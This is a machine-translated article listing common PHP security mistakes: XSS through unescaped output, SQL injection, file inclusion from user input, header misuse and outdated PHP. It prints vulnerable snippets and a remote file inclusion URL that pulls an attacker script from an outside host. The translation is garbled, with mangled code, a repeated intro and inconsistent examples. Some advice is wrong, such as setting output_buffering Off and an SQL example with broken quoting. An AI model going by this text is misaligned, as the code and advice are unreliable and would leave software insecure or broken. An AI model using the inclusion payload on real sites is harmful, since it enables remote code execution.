Summary of errors that php may easily make when writing secure code. 1. do not translate htmlentities into a basic knowledge: all untrusted input (especially the data submitted by the user from the form) must be converted before output. Echo $ _ GET [usename ];
1. do not translate html entities
A basic knowledge: all untrusted input (especially the data submitted by the user from the form) must be converted before output.
Echo $ _ GET ['usename'];
This example may be output:
Script/* script for admin password change or cookie setting */script
This is an obvious security risk, unless you ensure that your users are correct.
How to fix:
We need to convert "<", ">", "and" to correct HTML representation (<,> ', and "), functions htmlspecialchars and htmlentities () this is exactly what we did.
The correct method:
Echo htmlspecialchars ($ _ GET ['username'], ENT_QUOTES );
2. ignore SQL input
I have discussed this problem in the simplest way to prevent SQL injection in an article (in php + mysql) and provided a simple method. Someone told me that they are already in php. set magic_quotes to On in ini, so you don't have to worry about this, but not all input is obtained from $ _ GET, $ _ POST or $ _ COOKIE!
How to fix:
Like in the simplest method to prevent SQL injection (in php + mysql), I recommend using the mysql_real_escape_string () function.
Correct practice:
The code is as follows:
$ SQL = "UPDATE users SET
Name = '. mysql_real_escape_string ($ name ).'
WHERE id = '. mysql_real_escape_string ($ id ).'";
Mysql_query ($ SQL );
?>
3. the HTTP-header-related functions are used incorrectly: header (), session_start (), and setcookie ()
Have you ever encountered this warning? "Warning: Cannot add header information-headers already sent [...]
Each time you download a webpage from the server, the server's output is divided into two parts: the header and the body.
The header contains some non-visual data, such as cookies. The header always arrives first. The body contains visualized html, images, and other data.
If output_buffering is set to Off, all HTTP-header-related functions must be called before output. The problem is that when you develop data in one environment and deploy the data in another environment, the output_buffering settings may be different. The result is switched to stopped. the cookie and session are not properly set .........
How to fix:
Make sure that the http-header-related function is called before the output, and make output_buffering = Off
.
4. insecure data is used for Require or include files.
Again, do not trust data that is not explicitly declared by yourself. Do not Include or require files obtained from $ _ GET, $ _ POST, or $ _ COOKIE.
For example:
The code is as follows:
Index. php
// Including header, config, database connection, etc
Include ($ _ GET ['filename']);
// Including footer
?>
Now any hacker can use: http://www.yourdomain.com/index.php? Filenamepolicanyfile.txt
To obtain your confidential information or execute a PHP script.
If allow_url_fopen = On, you are even more dead:
Try this input:
Http://www.yourdomain.com/index.php? Filename = http % 3A % 2F % 2Fdomain.com % 2Fphphack. php
Now your webpage contains the output of http://www.youaredoomed.com/phphack.php. hackers can send spam emails, change passwords, delete files, and so on. As long as you can get it.
How to fix:
You must control which files can be included in the include or require command.
The following is a quick but incomplete solution:
The code is as follows:
// Include only files that are allowed.
$ AllowedFiles = array('file1.txt', 'file2.txt', 'file3.txt ');
If (in_array (string) $ _ GET ['filename'], $ allowedFiles )){
Include ($ _ GET ['filename']);
}
Else {
Exit ('not allowed ');
}
?>
5. Syntax error
Syntax errors include all lexical and syntax errors, which are so common that I have to list them here. The solution is to carefully study the PHP syntax and avoid missing a bracket, braces, semicolons, and quotation marks. There is another way to change the editor, so don't use Notepad!
6. rarely used or not object-oriented
Many projects do not use PHP's object-oriented technology. as a result, code maintenance becomes very time-consuming and labor-consuming. PHP supports more and more object-oriented technologies, and it is getting better and better. we have no reason not to use object-oriented technology.
7. do not use the framework
95% of PHP projects are doing the same four things: Create, edit, list, and delete. now there are many MVC frameworks to help us complete these four things. why don't we use them?
8. I do not know the existing functions in PHP.
The core of PHP contains many functions. Many programmers repeatedly invent the wheel. A lot of time is wasted. Search for PHP mamual before encoding, and search for it on google. There may be new discoveries! Exec () in PHP is a powerful function that can execute cmd shell and return the last line of the execution result as a string. For security considerations, you can use EscapeShellCmd ()
9. use the old version of PHP
Many programmers are still using PHP4. The development on PHP4 cannot fully utilize the potential of PHP, and there are still some security risks. It does not take a lot of effort to go to PHP5. Most PHP4 programs can be migrated to PHP5 as long as few statements are modified or even no changes are required. According to the http://www.nexen.net survey, only 12% of PHP servers use PHP5, so 88% of PHP developers are still using PHP4.
10. quote the quotation marks twice.
Have you ever seen \ 'or \' in the webpage? This is usually because magic_quotes is set to off in the developer's environment, while magic_quotes = on. PHP will repeatedly run addslashes () on the data in GET, POST, and COOKIE on the deployed server ().
Original text:
It's a string
Magic quotes on:
It \'s a string
Run Again
Addslashes ():
It \'s a string
HTML output:
It \'s a string
Another case is that the user entered the wrong login information at the beginning. after the server detects the wrong input, the same form is output and the user needs to input it again, causing the user's input to be converted twice!
A basic knowledge of entities: all untrusted input (especially the data submitted by the user from the form) must be converted before output. Echo $ _ GET ['usename ']; this...
